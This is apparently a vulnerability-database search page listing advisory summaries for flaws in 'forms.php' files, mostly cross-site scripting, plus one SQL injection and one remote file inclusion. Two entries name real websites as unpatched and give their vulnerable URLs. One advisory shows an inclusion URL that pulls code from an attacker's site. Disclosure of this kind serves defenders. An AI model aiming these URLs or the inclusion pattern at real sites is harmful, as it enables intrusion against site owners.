16 matches found
EUVD-2014-8582
Malware in sbrugna...
Cross-Site Scripting (XSS)
spipu/html2pdf is vulnerable to Cross-Site Scripting XSS. The vulnerability exists due to lack of sanitization in forms.php which allows an attacker to inject and execute arbitrary JavaScript...
Spipu HTML2PDF vulnerable to cross-site scripting
Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php...
GHSA-99FG-2H75-M92H Spipu HTML2PDF vulnerable to cross-site scripting
Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php...
CVE-2023-39062
Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php...
CVE-2023-39062
Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php...
Spipu HTML2PDF 跨站脚本漏洞
Spipu Html2Pdf is an open source Html to Pdf converter written in Php by Laurent Minguet, an individual developer in France. A security vulnerability exists in versions prior to Spipu HTML2PDF v.5.2.8, which stems from the presence of a cross-site scripting vulnerability that allows remote...
codezone.pt XSS vulnerability
Vulnerable URL: http://www.codezone.pt/forms.php?s='" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 22.12.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 18539049 VIP website status:| No Check codezone.pt SSL connection:| Grade: A...
darkeprobatejuvenile.org XSS vulnerability
Vulnerable URL: http://www.darkeprobatejuvenile.org/forms.php?agencynumber=1"...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in goYWP WebPress 13.00.06 allow remote attackers to inject arbitrary web script or HTML via the 1 searchparam parameter to search.php or 2 name, 3 address, or 4 comment parameter to forms.php...
CVE-2014-8751
Multiple cross-site scripting XSS vulnerabilities in goYWP WebPress 13.00.06 allow remote attackers to inject arbitrary web script or HTML via the 1 searchparam parameter to search.php or 2 name, 3 address, or 4 comment parameter to forms.php...
CVE-2014-8751
GoYWP WebPress 13.00.06 is affected by multiple XSS vulnerabilities (CVE-2014-8751). The issues allow remote attackers to inject arbitrary web script or HTML via the following inputs: (1) search.php with the search_param parameter, and (2) forms.php with the name, address, or comment parameters. ...
A Forms 1.4.0 - a-forms.php a_form_section_page Function message Parameter XSS
The A Forms WordPress plugin was affected by a a-forms.php aformsectionpage Function message Parameter XSS security vulnerability...
A Forms 1.4.0 - a-forms.php a_form_initial_page Function Multiple Parameter XSS
The A Forms WordPress plugin was affected by an a-forms.php aforminitialpage Function Multiple Parameter XSS security vulnerability...
CVE-2014-3210
CVE-2014-3210 describes an SQL injection in the WordPress Booking System (Booking Calendar) plugin. The vulnerability affects the plugin’s dopbs-backend-forms.php and allows remote authenticated users to execute arbitrary SQL commands via the booking_form_id parameter sent to wp-admin/admin-ajax....
Article System远程文件包含漏洞
Article System是一款基于PHP的WEB应用程序。 Article System不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'INCLUDEDIR'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Article System 1.0 http://artsys.sourceforge.net/ http://example.com/scriptpath/include/forms.php?INCLUDEDIR=attacker's site...